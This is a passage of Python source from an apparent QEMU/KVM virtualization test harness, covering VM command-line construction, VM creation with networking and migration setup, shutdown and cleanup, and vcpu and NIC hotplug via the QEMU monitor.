cmd += ",writeout=immediate"
p9_readonly = params.get("9p_readonly")
if p9_readonly == "yes":
cmd += ",readonly"
devices.insert(StrDev('fsdev', cmdline=cmd))
dev = QDevice('virtio-9p-pci', parent_bus={'type': 'pci'})
dev.set_param('fsdev', 'local1')
dev.set_param('mount_tag', 'autotest_tag')
devices.insert(dev)
extra_params = params.get("extra_params")
if extra_params:
devices.insert(StrDev('extra', cmdline=extra_params))
bios_path = params.get("bios_path")
if bios_path:
devices.insert(StrDev('bios', cmdline="-bios %s" % bios_path))
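# Select the accelerator: -no-kvm / -enable-kvm are only appended when the
# binary advertises them, and disable_kvm=yes implies enable_kvm=no (TCG).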
disable_kvm_option = ""
if (devices.has_option("no-kvm")):
disable_kvm_option = "-no-kvm"
enable_kvm_option = ""
if (devices.has_option("enable-kvm")):
enable_kvm_option = "-enable-kvm"
if (params.get("disable_kvm", "no") == "yes"):
params["enable_kvm"] = "no"
if (params.get("enable_kvm", "yes") == "no"):
devices.insert(StrDev('nokvm', cmdline=disable_kvm_option))
logging.debug("qemu will run in TCG mode")
else:
devices.insert(StrDev('kvm', cmdline=enable_kvm_option))
logging.debug("qemu will run in KVM mode")
self.no_shutdown = (devices.has_option("no-shutdown") and
params.get("disable_shutdown", "no") == "yes")
if self.no_shutdown:
devices.insert(StrDev('noshutdown', cmdline="-no-shutdown"))
user_runas = params.get("user_runas")
if devices.has_option("runas") and user_runas:
devices.insert(StrDev('runas', cmdline="-runas %s" % user_runas))
if params.get("enable_sga") == "yes":
devices.insert(StrDev('sga', cmdline=add_sga(devices)))
if params.get("smartcard", "no") == "yes":
sc_chardev = params.get("smartcard_chardev")
sc_id = params.get("smartcard_id")
devices.insert(StrDev('smartcard',
cmdline=add_smartcard(devices, sc_chardev, sc_id)))
if params.get("enable_watchdog", "no") == "yes":
cmd = add_watchdog(devices,
params.get("watchdog_device_type", None),
params.get("watchdog_action", "reset"))
devices.insert(StrDev('watchdog', cmdline=cmd))
option_roms = params.get("option_roms")
if option_roms:
cmd = ""
for opt_rom in option_roms.split():
cmd += add_option_rom(devices, opt_rom)
if cmd:
devices.insert(StrDev('ROM', cmdline=cmd))
return devices
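# Helper: set up the host side of a NIC: create a macvtap device, or open
# tap fds and bring the interface up (adding it to the bridge first when
# nettype is 'bridge').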
def _nic_tap_add_helper(self, nic):
if nic.nettype == 'macvtap':
logging.info("Adding macvtap ifname: %s", nic.ifname)
utils_net.add_nic_macvtap(nic)
else:
nic.tapfds = utils_net.open_tap("/dev/net/tun", nic.ifname,
queues=nic.queues, vnet_hdr=True)
logging.debug("Adding VM %s NIC ifname %s to bridge %s",
self.name, nic.ifname, nic.netdst)
if nic.nettype == 'bridge':
utils_net.add_to_bridge(nic.ifname, nic.netdst)
utils_net.bring_up_ifname(nic.ifname)
def _nic_tap_remove_helper(self, nic):
try:
if nic.nettype == 'macvtap':
logging.info("Remove macvtap ifname %s", nic.ifname)
tap = utils_net.Macvtap(nic.ifname)
tap.delete()
else:
logging.debug("Removing VM %s NIC ifname %s from bridge %s",
self.name, nic.ifname, nic.netdst)
if nic.tapfds:
for i in nic.tapfds.split(':'):
os.close(int(i))
if nic.vhostfds:
for i in nic.vhostfds.split(':'):
os.close(int(i))
except TypeError:
pass
@error.context_aware
def create(self, name=None, params=None, root_dir=None,
timeout=CREATE_TIMEOUT, migration_mode=None,
migration_exec_cmd=None, migration_fd=None,
mac_source=None):
"""
Start the VM by running a qemu command.
All parameters are optional. If name, params or root_dir are not
supplied, the respective values stored as class attributes are used.
:param name: The name of the object
:param params: A dict containing VM params
:param root_dir: Base directory for relative filenames
:param migration_mode: If supplied, start VM for incoming migration
using this protocol (either 'rdma', 'x-rdma', 'tcp', 'unix' or 'exec')
:param migration_exec_cmd: Command to embed in '-incoming "exec: ..."'
(e.g. 'gzip -c -d filename') if migration_mode is 'exec';
defaults to listening on a random TCP port
:param migration_fd: Open file descriptor from the machine that should migrate.
:param mac_source: A VM object from which to copy MAC addresses. If not
specified, new addresses will be generated.
:raise VMCreateError: If qemu terminates unexpectedly
:raise VMKVMInitError: If KVM initialization fails
:raise VMHugePageError: If hugepage initialization fails
:raise VMImageMissingError: If a CD image is missing
:raise VMHashMismatchError: If a CD image hash doesn't match the
expected hash
:raise VMBadPATypeError: If an unsupported PCI assignment type is
requested
:raise VMPAError: If no PCI assignable devices could be assigned
:raise TAPCreationError: If we fail to create a tap fd
:raise BRAddIfError: If we fail to add a tap to a bridge
:raise TAPBringUpError: If we fail to bring up a tap
:raise PrivateBridgeError: If we fail to bring up the private bridge
"""
error.context("creating '%s'" % self.name)
self.destroy(free_mac_addresses=False)
if name is not None:
self.name = name
self.devices = None # Representation changed
if params is not None:
self.params = params
self.devices = None # Representation changed
if root_dir is not None:
self.root_dir = root_dir
self.devices = None # Representation changed
name = self.name
params = self.params
root_dir = self.root_dir
# Verify the md5sum of the ISO images
for cdrom in params.objects("cdroms"):
cdrom_params = params.object_params(cdrom)
iso = cdrom_params.get("cdrom")
if iso:
iso = utils_misc.get_path(data_dir.get_data_dir(), iso)
if not os.path.exists(iso):
raise virt_vm.VMImageMissingError(iso)
compare = False
if cdrom_params.get("md5sum_1m"):
logging.debug("Comparing expected MD5 sum with MD5 sum of "
"first MB of ISO file...")
actual_hash = utils.hash_file(iso, 1048576, method="md5")
expected_hash = cdrom_params.get("md5sum_1m")
compare = True
elif cdrom_params.get("md5sum"):
logging.debug("Comparing expected MD5 sum with MD5 sum of "
"ISO file...")
actual_hash = utils.hash_file(iso, method="md5")
expected_hash = cdrom_params.get("md5sum")
compare = True
elif cdrom_params.get("sha1sum"):
logging.debug("Comparing expected SHA1 sum with SHA1 sum "
"of ISO file...")
actual_hash = utils.hash_file(iso, method="sha1")
expected_hash = cdrom_params.get("sha1sum")
compare = True
if compare:
if actual_hash == expected_hash:
logging.debug("Hashes match")
else:
raise virt_vm.VMHashMismatchError(actual_hash,
expected_hash)
# Make sure the following code is not executed by more than one thread
# at the same time
lockfile = open("/tmp/kvm-autotest-vm-create.lock", "w+")
fcntl.lockf(lockfile, fcntl.LOCK_EX)
try:
# Handle port redirections
redir_names = params.objects("redirs")
host_ports = utils_misc.find_free_ports(
5000, 6000, len(redir_names))
self.redirs = {}
for i in range(len(redir_names)):
redir_params = params.object_params(redir_names[i])
guest_port = int(redir_params.get("guest_port"))
self.redirs[guest_port] = host_ports[i]
# Generate basic parameter values for all NICs and create TAP fd
for nic in self.virtnet:
nic_params = params.object_params(nic.nic_name)
pa_type = nic_params.get("pci_assignable")
if pa_type and pa_type != "no":
device_driver = nic_params.get("device_driver",
"pci-assign")
if "mac" not in nic:
self.virtnet.generate_mac_address(nic["nic_name"])
mac = nic["mac"]
if self.pci_assignable is None:
self.pci_assignable = test_setup.PciAssignable(
driver=params.get("driver"),
driver_option=params.get("driver_option"),
host_set_flag=params.get("host_setup_flag"),
kvm_params=params.get("kvm_default"),
vf_filter_re=params.get("vf_filter_re"),
pf_filter_re=params.get("pf_filter_re"),
device_driver=device_driver)
# Virtual Functions (VF) assignable devices
if pa_type == "vf":
self.pci_assignable.add_device(device_type=pa_type,
mac=mac)
# Physical NIC (PF) assignable devices
elif pa_type == "pf":
self.pci_assignable.add_device(device_type=pa_type,
name=nic_params.get("device_name"))
else:
raise virt_vm.VMBadPATypeError(pa_type)
else:
# fill in key values, validate nettype
# note: make_create_command() calls vm.add_nic (i.e. on a
# copy)
if nic_params.get('netdst') == 'private':
nic.netdst = (test_setup.
PrivateBridgeConfig(nic_params).brname)
nic = self.add_nic(**dict(nic)) # implied add_netdev
if mac_source:
# Will raise exception if source doesn't
# have a corresponding nic
logging.debug("Copying mac for nic %s from VM %s"
% (nic.nic_name, mac_source.name))
nic.mac = mac_source.get_mac_address(nic.nic_name)
if nic.ifname in utils_net.get_net_if():
self.virtnet.generate_ifname(nic.nic_name)
if nic.nettype in ['bridge', 'network', 'macvtap']:
self._nic_tap_add_helper(nic)
if ((nic_params.get("vhost") == 'vhost=on') and
(nic_params.get("enable_vhostfd", "yes") == "yes")):
vhostfds = []
for i in xrange(int(nic.queues)):
vhostfds.append(str(os.open("/dev/vhost-net",
os.O_RDWR)))
nic.vhostfds = ':'.join(vhostfds)
elif nic.nettype == 'user':
logging.info("Assuming dependencies met for "
"user mode nic %s, and ready to go"
% nic.nic_name)
self.virtnet.update_db()
# Find available VNC port, if needed
if params.get("display") == "vnc":
self.vnc_port = utils_misc.find_free_port(5900, 6100)
# Find random UUID if specified 'uuid = random' in config file
if params.get("uuid") == "random":
f = open("/proc/sys/kernel/random/uuid")
self.uuid = f.read().strip()
f.close()
if self.pci_assignable is not None:
self.pa_pci_ids = self.pci_assignable.request_devs()
if self.pa_pci_ids:
logging.debug("Successfully assigned devices: %s",
self.pa_pci_ids)
else:
raise virt_vm.VMPAError(pa_type)
# Make qemu command
try:
self.devices = self.make_create_command()
logging.debug(self.devices.str_short())
logging.debug(self.devices.str_bus_short())
qemu_command = self.devices.cmdline()
except error.TestNAError:
# TestNAErrors should be kept as-is so we generate SKIP
# results instead of bogus FAIL results
raise
except Exception:
for nic in self.virtnet:
self._nic_tap_remove_helper(nic)
# TODO: log_last_traceback is being moved into autotest.
# use autotest.client.shared.base_utils when it's completed.
if 'log_last_traceback' in utils.__dict__:
utils.log_last_traceback('Failed to create qemu command:')
else:
utils_misc.log_last_traceback('Failed to create qemu '
'command:')
raise virt_vm.VMStartError(self.name, 'Error occurred while '
'executing make_create_command(). '
'Check the log for traceback.')
# Add migration parameters if required
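# tcp/rdma/x-rdma listen on a free port, 'unix' uses a socket file, 'exec'
# defaults to 'nc -l <port>' when no command is given, and 'fd' reuses an
# already-open descriptor.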
if migration_mode in ["tcp", "rdma", "x-rdma"]:
self.migration_port = utils_misc.find_free_port(5200, 6000)
qemu_command += (" -incoming " + migration_mode +
":0:%d" % self.migration_port)
elif migration_mode == "unix":
self.migration_file = "/tmp/migration-unix-%s" % self.instance
qemu_command += " -incoming unix:%s" % self.migration_file
elif migration_mode == "exec":
if migration_exec_cmd is None:
self.migration_port = utils_misc.find_free_port(5200, 6000)
qemu_command += (' -incoming "exec:nc -l %s"' %
self.migration_port)
else:
qemu_command += (' -incoming "exec:%s"' %
migration_exec_cmd)
elif migration_mode == "fd":
qemu_command += ' -incoming "fd:%d"' % (migration_fd)
p9_fs_driver = params.get("9p_fs_driver")
if p9_fs_driver == "proxy":
proxy_helper_name = params.get("9p_proxy_binary",
"virtfs-proxy-helper")
proxy_helper_cmd = utils_misc.get_path(root_dir,
proxy_helper_name)
if not proxy_helper_cmd:
raise virt_vm.VMConfigMissingError(self.name,
"9p_proxy_binary")
p9_export_dir = params.get("9p_export_dir")
if not p9_export_dir:
raise virt_vm.VMConfigMissingError(self.name,
"9p_export_dir")
proxy_helper_cmd += " -p " + p9_export_dir
proxy_helper_cmd += " -u 0 -g 0"
p9_socket_name = params.get("9p_socket_name")
proxy_helper_cmd += " -s " + p9_socket_name
proxy_helper_cmd += " -n"
logging.info("Running Proxy Helper:\n%s", proxy_helper_cmd)
self.process = aexpect.run_bg(proxy_helper_cmd, None,
logging.info,
"[9p proxy helper]",
auto_close=False)
logging.info("Running qemu command (reformatted):\n%s",
qemu_command.replace(" -", " \\\n -"))
self.qemu_command = qemu_command
self.process = aexpect.run_bg(qemu_command, None,
logging.info, "[qemu output] ",
auto_close=False)
self.start_time = time.time()
# test doesn't need to hold tapfd's open
for nic in self.virtnet:
if nic.has_key('tapfds'): # implies bridge/tap
try:
for i in nic.tapfds.split(':'):
os.close(int(i))
# qemu process retains access via open file
# remove this attribute from virtnet because
# fd numbers are not always predictable and
# vm instance must support cloning.
del nic['tapfds']
# File descriptor is already closed
except OSError:
pass
if nic.has_key('vhostfds'):
try:
for i in nic.vhostfds.split(':'):
os.close(int(i))
del nic['vhostfds']
except OSError:
pass
# Make sure the process was started successfully
if not self.process.is_alive():
status = self.process.get_status()
output = self.process.get_output().strip()
migration_in_course = migration_mode is not None
unknown_protocol = "unknown migration protocol" in output
if migration_in_course and unknown_protocol:
e = VMMigrateProtoUnsupportedError(migration_mode, output)
else:
e = virt_vm.VMCreateError(qemu_command, status, output)
self.destroy()
raise e
# Establish monitor connections
self.monitors = []
for monitor_name in params.objects("monitors"):
monitor_params = params.object_params(monitor_name)
try:
monitor = qemu_monitor.wait_for_create_monitor(self,
monitor_name, monitor_params, timeout)
except qemu_monitor.MonitorConnectError, detail:
logging.error(detail)
self.destroy()
raise
# Add this monitor to the list
self.monitors += [monitor]
# Create isa serial ports.
self.serial_ports = []
for serial in params.objects("isa_serials"):
self.serial_ports.append(serial)
# Create virtio_ports (virtio_serialports and virtio_consoles)
i = 0
self.virtio_ports = []
for port in params.objects("virtio_ports"):
port_params = params.object_params(port)
if port_params.get('virtio_port_chardev') == "spicevmc":
filename = 'dev%s' % port
else:
filename = self.get_virtio_port_filename(port)
port_name = port_params.get('virtio_port_name_prefix', None)
if port_name: # If port_name_prefix was used
port_name = port_name + str(i)
else: # Implicit name - port
port_name = port
if port_params.get('virtio_port_type') in ("console",
"virtio_console"):
self.virtio_ports.append(
qemu_virtio_port.VirtioConsole(port, port_name,
filename))
else:
self.virtio_ports.append(
qemu_virtio_port.VirtioSerial(port, port_name,
filename))
i += 1
# Get the output so far, to see if we have any problems with
# KVM modules or with hugepage setup.
output = self.process.get_output()
if re.search("Could not initialize KVM", output, re.IGNORECASE):
e = virt_vm.VMKVMInitError(
qemu_command, self.process.get_output())
self.destroy()
raise e
if "alloc_mem_area" in output:
e = virt_vm.VMHugePageError(
qemu_command, self.process.get_output())
self.destroy()
raise e
logging.debug("VM appears to be alive with PID %s", self.get_pid())
vcpu_thread_pattern = self.params.get("vcpu_thread_pattern",
r"thread_id.?[:|=]\s*(\d+)")
self.vcpu_threads = self.get_vcpu_pids(vcpu_thread_pattern)
vhost_thread_pattern = params.get("vhost_thread_pattern",
r"\w+\s+(\d+)\s.*\[vhost-%s\]")
self.vhost_threads = self.get_vhost_threads(vhost_thread_pattern)
# Establish a session with the serial console
# Let's consider the first serial port as serial console.
# Note: requires a version of netcat that supports -U
try:
tmp_serial = self.serial_ports[0]
except IndexError:
raise virt_vm.VMConfigMissingError(name, "isa_serial")
self.serial_console = aexpect.ShellSession(
"nc -U %s" % self.get_serial_console_filename(tmp_serial),
auto_close=False,
output_func=utils_misc.log_line,
output_params=("serial-%s-%s.log" % (tmp_serial, name),),
prompt=self.params.get("shell_prompt", "[\#\$]"))
del tmp_serial
for key, value in self.logs.items():
outfile = "%s-%s.log" % (key, name)
self.logsessions[key] = aexpect.Tail(
"nc -U %s" % value,
auto_close=False,
output_func=utils_misc.log_line,
output_params=(outfile,))
self.logsessions[key].set_log_file(outfile)
if params.get("paused_after_start_vm") != "yes":
# start guest
if self.monitor.verify_status("paused"):
try:
self.monitor.cmd("cont")
except qemu_monitor.QMPCmdError, e:
if ((e.data['class'] == "MigrationExpected") and
(migration_mode is not None)):
logging.debug("Migration did not start yet...")
else:
raise e
finally:
fcntl.lockf(lockfile, fcntl.LOCK_UN)
lockfile.close()
def wait_for_status(self, status, timeout, first=0.0, step=1.0, text=None):
"""
Wait until the VM status changes to specified status
:return: True in case the status has changed before timeout, otherwise
return None.
:param timeout: Timeout in seconds
:param first: Time to sleep before first attempt
:param step: Time to sleep between attempts in seconds
:param text: Text to print while waiting, for debug purposes
"""
return utils_misc.wait_for(lambda: self.monitor.verify_status(status),
timeout, first, step, text)
def wait_until_paused(self, timeout):
"""
Wait until the VM is paused.
:return: True in case the VM is paused before timeout, otherwise
return None.
:param timeout: Timeout in seconds
"""
return self.wait_for_status("paused", timeout)
def wait_until_dead(self, timeout, first=0.0, step=1.0):
"""
Wait until VM is dead.
:return: True if VM is dead before timeout, otherwise returns None.
:param timeout: Timeout in seconds
:param first: Time to sleep before first attempt
:param step: Time to sleep between attempts in seconds
"""
return utils_misc.wait_for(self.is_dead, timeout, first, step)
def wait_for_shutdown(self, timeout=60):
"""
Wait until the guest shuts down.
Helpful when waiting for a shutdown initiated from inside the guest.
:return: True in case the VM was shut down, None otherwise.
Note that the VM is not necessarily dead when this function returns
True. If QEMU is running in -no-shutdown mode, the QEMU process
may be still alive.
"""
if self.no_shutdown:
return self.wait_until_paused(timeout)
else:
return self.wait_until_dead(timeout, 1, 1)
def graceful_shutdown(self, timeout=60):
"""
Try to gracefully shut down the VM.
:return: True if VM was successfully shut down, None otherwise.
Note that the VM is not necessarily dead when this function returns
True. If QEMU is running in -no-shutdown mode, the QEMU process
may be still alive.
"""
if self.params.get("shutdown_command"):
# Try to destroy with shell command
logging.debug("Shutting down VM %s (shell)", self.name)
try:
if len(self.virtnet) > 0:
session = self.login()
else:
session = self.serial_login()
except (virt_vm.VMInterfaceIndexError), e:
try:
session = self.serial_login()
except (remote.LoginError, virt_vm.VMError), e:
logging.debug(e)
except (remote.LoginError, virt_vm.VMError), e:
logging.debug(e)
else:
try:
# Send the shutdown command
session.sendline(self.params.get("shutdown_command"))
if self.wait_for_shutdown(timeout):
return True
finally:
session.close()
def _cleanup(self, free_mac_addresses):
"""
Do cleanup work:
- remove VM monitor files
- close the qemu process
- close the serial console
- close the log sessions
- delete tmp files
- free MAC addresses, if needed
- delete macvtap interfaces, if needed
:param free_mac_addresses: Whether to release the VM's NICs back
to the address pool.
"""
self.monitors = []
if self.pci_assignable:
self.pci_assignable.release_devs()
self.pci_assignable = None
if self.process:
self.process.close()
if self.serial_console:
self.serial_console.close()
if self.logsessions:
for key in self.logsessions:
self.logsessions[key].close()
# Build the list of tmp files which should be deleted.
file_list = [self.get_testlog_filename()]
file_list += qemu_monitor.get_monitor_filenames(self)
file_list += self.get_virtio_port_filenames()
file_list += self.get_serial_console_filenames()
file_list += self.logs.values()
for f in file_list:
try:
os.unlink(f)
except OSError:
pass
if hasattr(self, "migration_file"):
try:
os.unlink(self.migration_file)
except OSError:
pass
if free_mac_addresses:
for nic_index in xrange(0, len(self.virtnet)):
self.free_mac_address(nic_index)
for nic in self.virtnet:
if nic.nettype == 'macvtap':
tap = utils_net.Macvtap(nic.ifname)
tap.delete()
def destroy(self, gracefully=True, free_mac_addresses=True):
"""
Destroy the VM.
If gracefully is True, first attempt to shutdown the VM with a shell
command. Then, attempt to destroy the VM via the monitor with a 'quit'
command. If that fails, send SIGKILL to the qemu process.
:param gracefully: If True, an attempt will be made to end the VM
using a shell command before trying to end the qemu process
with a 'quit' or a kill signal.
:param free_mac_addresses: If True, the MAC addresses used by the VM
will be freed.
"""
try:
# Is it already dead?
if self.is_dead():
return
logging.debug("Destroying VM %s (PID %s)", self.name,
self.get_pid())
kill_timeout = int(self.params.get("kill_timeout", "60"))
if gracefully:
self.graceful_shutdown(kill_timeout)
if self.is_dead():
logging.debug("VM %s down (shell)", self.name)
return
else:
logging.debug("VM %s failed to go down (shell)", self.name)
if self.monitor:
# Try to finish process with a monitor command
logging.debug("Ending VM %s process (monitor)", self.name)
try:
self.monitor.quit()
except qemu_monitor.MonitorError, e:
logging.warn(e)
else:
# Wait for the VM to be really dead
if self.wait_until_dead(5, 0.5, 0.5):
logging.debug("VM %s down (monitor)", self.name)
return
else:
logging.debug("VM %s failed to go down (monitor)",
self.name)
# If the VM isn't dead yet...
pid = self.process.get_pid()
logging.debug("Ending VM %s process (killing PID %s)",
self.name, pid)
utils_misc.kill_process_tree(pid, 9)
# Wait for the VM to be really dead
if utils_misc.wait_for(self.is_dead, 5, 0.5, 0.5):
logging.debug("VM %s down (process killed)", self.name)
return
# If all else fails, we've got a zombie...
logging.error("VM %s (PID %s) is a zombie!", self.name,
self.process.get_pid())
finally:
self._cleanup(free_mac_addresses)
@property
def monitor(self):
"""
Return the main monitor object, selected by the parameter main_monitor.
If main_monitor isn't defined, return the first monitor.
If no monitors exist, or if main_monitor refers to a nonexistent
monitor, return None.
"""
for m in self.monitors:
if m.name == self.params.get("main_monitor"):
return m
if self.monitors and not self.params.get("main_monitor"):
return self.monitors[0]
return None
def get_monitors_by_type(self, mon_type):
"""
Return list of monitors of mon_type type.
:param mon_type: desired monitor type (qmp, human)
"""
return [_ for _ in self.monitors if _.protocol == mon_type]
def get_peer(self, netid):
"""
Return the peer of a netdev or network device.
:param netid: id of netdev or device
:return: id of the peer device otherwise None
"""
o = self.monitor.info("network")
network_info = o
if isinstance(o, dict):
network_info = o.get("return")
netdev_peer_re = self.params.get("netdev_peer_re")
if not netdev_peer_re:
default_netdev_peer_re = "\s{2,}(.*?): .*?\\\s(.*?):"
logging.warning("Missing config netdev_peer_re for VM %s, "
"using default %s", self.name,
default_netdev_peer_re)
netdev_peer_re = default_netdev_peer_re
pairs = re.findall(netdev_peer_re, network_info, re.S)
for nic, tap in pairs:
if nic == netid:
return tap
if tap == netid:
return nic
return None
def get_ifname(self, nic_index=0):
"""
Return the ifname of a bridge/tap device associated with a NIC.
:param nic_index: Index of the NIC
"""
return self.virtnet[nic_index].ifname
def get_pid(self):
"""
Return the VM's PID. If the VM is dead return None.
:note: This works under the assumption that self.process.get_pid()
returns the PID of the parent shell process.
"""
try:
children = commands.getoutput("ps --ppid=%d -o pid=" %
self.process.get_pid()).split()
return int(children[0])
except (TypeError, IndexError, ValueError):
return None
def get_shell_pid(self):
"""
Return the PID of the parent shell process.
:note: This works under the assumption that self.process.get_pid()
returns the PID of the parent shell process.
"""
return self.process.get_pid()
def get_vnc_port(self):
"""
Return self.vnc_port.
"""
return self.vnc_port
def get_vcpu_pids(self, vcpu_thread_pattern):
"""
Return the list of vcpu PIDs
:return: the list of vcpu PIDs
"""
return [int(_) for _ in re.findall(vcpu_thread_pattern,
str(self.monitor.info("cpus")))]
def get_vhost_threads(self, vhost_thread_pattern):
"""
Return the list of vhost threads PIDs
:param vhost_thread_pattern: a regex to match the vhost threads
:type vhost_thread_pattern: string
:return: a list of vhost threads PIDs
:rtype: list of integer
"""
return [int(_) for _ in re.findall(vhost_thread_pattern %
self.get_pid(),
utils.system_output("ps aux"))]
def get_shared_meminfo(self):
"""
Returns the VM's shared memory information.
:return: Shared memory used by VM (MB)
"""
if self.is_dead():
logging.error("Could not get shared memory info from dead VM.")
return None
filename = "/proc/%d/statm" % self.get_pid()
shm = int(open(filename).read().split()[2])
# statm stores information in pages, translate it to MB
return shm * 4.0 / 1024
def get_spice_var(self, spice_var):
"""
        Return the string value of the requested spice variable, or None.
        :param spice_var: spice-related variable, e.g. 'spice_port'
"""
return self.spice_options.get(spice_var, None)
@error.context_aware
def hotplug_vcpu(self, cpu_id=None, plug_command=""):
"""
        Hotplug a vcpu. If cpu_id is not given, the minimum unused id is used.
        The given plug_command is used if assigned; otherwise the command is
        generated automatically based on the monitor type.
        :param cpu_id: the cpu id to hotplug.
"""
vcpu_threads_count = len(self.vcpu_threads)
plug_cpu_id = cpu_id
if plug_cpu_id is None:
plug_cpu_id = vcpu_threads_count
if plug_command:
vcpu_add_cmd = plug_command % plug_cpu_id
else:
if self.monitor.protocol == 'human':
vcpu_add_cmd = "cpu_set %s online" % plug_cpu_id
elif self.monitor.protocol == 'qmp':
vcpu_add_cmd = "cpu-add id=%s" % plug_cpu_id
try:
self.monitor.verify_supported_cmd(vcpu_add_cmd.split()[0])
except qemu_monitor.MonitorNotSupportedCmdError:
raise error.TestNAError("%s monitor not support cmd '%s'" %
(self.monitor.protocol, vcpu_add_cmd))
try:
cmd_output = self.monitor.send_args_cmd(vcpu_add_cmd)
except qemu_monitor.QMPCmdError, e:
return (False, str(e))
vcpu_thread_pattern = self.params.get("vcpu_thread_pattern",
r"thread_id.?[:|=]\s*(\d+)")
self.vcpu_threads = self.get_vcpu_pids(vcpu_thread_pattern)
if len(self.vcpu_threads) == vcpu_threads_count + 1:
return(True, plug_cpu_id)
else:
return(False, cmd_output)
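    # Illustrative note (not from the original source): with a human monitor
    # and no plug_command, hotplug_vcpu(4) sends "cpu_set 4 online"; with a
    # QMP monitor it sends "cpu-add id=4".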
@error.context_aware
def hotplug_nic(self, **params):
"""
Convenience method wrapper for add_nic() and add_netdev().
:return: dict-like object containing nic's details
"""
nic_name = self.add_nic(**params)["nic_name"]
self.activate_netdev(nic_name)
self.activate_nic(nic_name)
return self.virtnet[nic_name]
@error.context_aware
def hotunplug_nic(self, nic_index_or_name):
"""
Convenience method wrapper for del/deactivate nic and netdev.
"""
# make sure we got a name
nic_name = self.virtnet[nic_index_or_name].nic_name
self.deactivate_nic(nic_name)
self.deactivate_netdev(nic_name)
self.del_nic(nic_name)
@error.context_aware
def add_netdev(self, **params):
"""
Hotplug a netdev device.
:param **params: NIC info. dict.
:return: netdev_id
"""
nic_name = params['nic_name']
nic = self.virtnet[nic_name]
nic_index = self.virtnet.nic_name_index(nic_name)
nic.set_if_none('netdev_id', utils_misc.generate_random_id())
nic.set_if_none('ifname', self.virtnet.generate_ifname(nic_index))
nic.set_if_none('nettype', 'bridge')
if nic.nettype in ['bridge', 'macvtap']: # implies tap
# destination is required, hard-code reasonable default if unset
# nic.set_if_none('netdst', 'virbr0')
# tapfd allocated/set in activate because requires system resources
nic.set_if_none('queues', '1')
ids = []
for i in range(int(nic.queues)):
ids.append(utils_misc.generate_random_id())
nic.set_if_none('tapfd_ids', ids)
elif nic.nettype == 'user':
pass # nothing to do
else: # unsupported nettype
raise virt_vm.VMUnknownNetTypeError(self.name, nic_name,
nic.nettype)
return nic.netdev_id
@error.context_aware
def del_netdev(self, nic_index_or_name):
"""
        Remove netdev info from a NIC on the VM; does not deactivate it.
        :param nic_index_or_name: name or index number of an existing NIC
"""
nic = self.virtnet[nic_index_or_name]
error.context("removing netdev info from nic %s from vm %s" % (
nic, self.name))
for propertea in ['netdev_id', 'ifname', 'queues',
'tapfds', 'tapfd_ids', 'vectors']:
if nic.has_key(propertea):
del nic[propertea]
def add_nic(self, **params):
"""
        Add a new NIC or set up an existing one, optionally creating a netdev if none exists.
:param **params: Parameters to set
:param nic_name: Name for existing or new device
:param nic_model: Model name to emulate
:param netdev_id: Existing qemu net device ID name, None to create new
:param mac: Optional MAC address, None to randomly generate.
"""
# returns existing or new nic object
nic = super(VM, self).add_nic(**params)
nic_index = self.virtnet.nic_name_index(nic.nic_name)
nic.set_if_none('vlan', str(nic_index))
nic.set_if_none('device_id', utils_misc.generate_random_id())
nic.set_if_none('queues', '1')
if not nic.has_key('netdev_id'):
# virtnet items are lists that act like dicts
nic.netdev_id = self.add_netdev(**dict(nic))
nic.set_if_none('nic_model', params['nic_model'])
nic.set_if_none('queues', params.get('queues', '1'))
if params.get("enable_msix_vectors") == "yes":
nic.set_if_none('vectors', 2 * int(nic.queues) + 1)
return nic
@error.context_aware
def activate_netdev(self, nic_index_or_name):
"""
Activate an inactive host-side networking device
        :raise IndexError: if the nic doesn't exist
        :raise VMUnknownNetTypeError: if nettype is unset/unsupported
        :raise IOError: if the TAP device node cannot be opened
        :raise VMAddNetDevError: if the operation failed
"""
tapfds = []
nic = self.virtnet[nic_index_or_name]
error.context("Activating netdev for %s based on %s" %
(self.name, nic))
msg_sfx = ("nic %s on vm %s with attach_cmd " %
(self.virtnet[nic_index_or_name], self.name))
attach_cmd = "netdev_add"
if nic.nettype == 'bridge': # implies tap
error.context("Opening tap device node for %s " % nic.ifname,
logging.debug)
python_tapfds = utils_net.open_tap("/dev/net/tun",
nic.ifname,
queues=nic.queues,
vnet_hdr=False)
for i in range(int(nic.queues)):
error.context("Assigning tap %s to qemu by fd" %
nic.tapfd_ids[i], logging.info)
lsof_cmd = "lsof -a -p %s -Ff -- /dev/net/tun" % self.get_pid()
openfd_list = utils.system_output(lsof_cmd).splitlines()
self.monitor.getfd(int(python_tapfds.split(':')[i]),
nic.tapfd_ids[i])
n_openfd_list = utils.system_output(lsof_cmd).splitlines()
new_qemu_fd = list(set(n_openfd_list) - set(openfd_list))
if not new_qemu_fd:
err_msg = "Can't get the tap fd in qemu process!"
raise virt_vm.VMAddNetDevError(err_msg)
tapfds.append(new_qemu_fd[0].lstrip("f"))
nic.set_if_none("tapfds", ":".join(tapfds))
if not self.devices:
err_msg = "Can't add nic for VM which is not running."
raise virt_vm.VMAddNetDevError(err_msg)
if ((int(nic.queues)) > 1 and
',fds=' in self.devices.get_help_text()):
attach_cmd += " type=tap,id=%s,fds=%s" % (nic.device_id,
nic.tapfds)
else:
attach_cmd += " type=tap,id=%s,fd=%s" % (nic.device_id,
nic.tapfds)
error.context("Raising interface for " + msg_sfx + attach_cmd,
logging.debug)
utils_net.bring_up_ifname(nic.ifname)
error.context("Raising bridge for " + msg_sfx + attach_cmd,
logging.debug)
# assume this will puke if netdst unset
if not nic.netdst is None:
utils_net.add_to_bridge(nic.ifname, nic.netdst)
elif nic.nettype == 'macvtap':
pass
elif nic.nettype == 'user':
attach_cmd += " user,id=%s" % nic.device_id
elif nic.nettype == 'none':
attach_cmd += " none"
else: # unsupported nettype
raise virt_vm.VMUnknownNetTypeError(self.name, nic_index_or_name,
nic.nettype)
if nic.has_key('netdev_extra_params'):
attach_cmd += nic.netdev_extra_params
error.context("Hotplugging " + msg_sfx + attach_cmd, logging.debug)
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(attach_cmd)
else:
self.monitor.send_args_cmd(attach_cmd, convert=False)
network_info = self.monitor.info("network")
if nic.device_id not in network_info:
# Don't leave resources dangling
self.deactivate_netdev(nic_index_or_name)
raise virt_vm.VMAddNetDevError(("Failed to add netdev: %s for " %
nic.device_id) + msg_sfx +
attach_cmd)
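    # Illustrative note (not from the original source): for a single-queue
    # bridge/tap NIC, the command assembled above looks roughly like
    #   netdev_add type=tap,id=<device_id>,fd=<tapfd>
    # and multi-queue NICs use "fds=<fd1:fd2:...>" when qemu advertises ',fds='.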
@error.context_aware
def activate_nic(self, nic_index_or_name):
"""
        Activate a VM's inactive NIC device and verify its state
